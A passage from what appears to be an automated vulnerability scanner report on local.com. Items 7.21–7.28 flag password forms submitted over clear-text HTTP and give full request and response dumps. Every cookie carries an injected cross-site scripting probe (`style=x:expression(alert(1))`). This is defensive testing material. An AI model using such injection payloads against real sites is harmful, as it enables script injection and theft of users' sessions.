__utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.21. http://www.local.com/coupons/printable/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.22. http://www.local.com/dialogs/register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27119
Date: Thu, 03 Feb 2011 16:55:56 GMT
Content-Length: 27119
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>www.local.com-Register</title
...[SNIP]...
<!-- END typeAhead items -->


<form name="aspnetForm" method="post" action="/dialogs/register.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password" type="password" id="defaultPageTemplate_password" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password2" type="password" id="defaultPageTemplate_password2" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$haveActPassword" type="password" id="defaultPageTemplate_haveActPassword" class="haveActInput" />
                       <p class="pTB10">
...[SNIP]...

7.23. http://www.local.com/events/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.24. http://www.local.com/events/category/music/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.25. http://www.local.com/events/category/performing-arts/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.26. http://www.local.com/events/category/sports/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.27. http://www.local.com/faq.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.28. http://www.local.com/privacy/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; 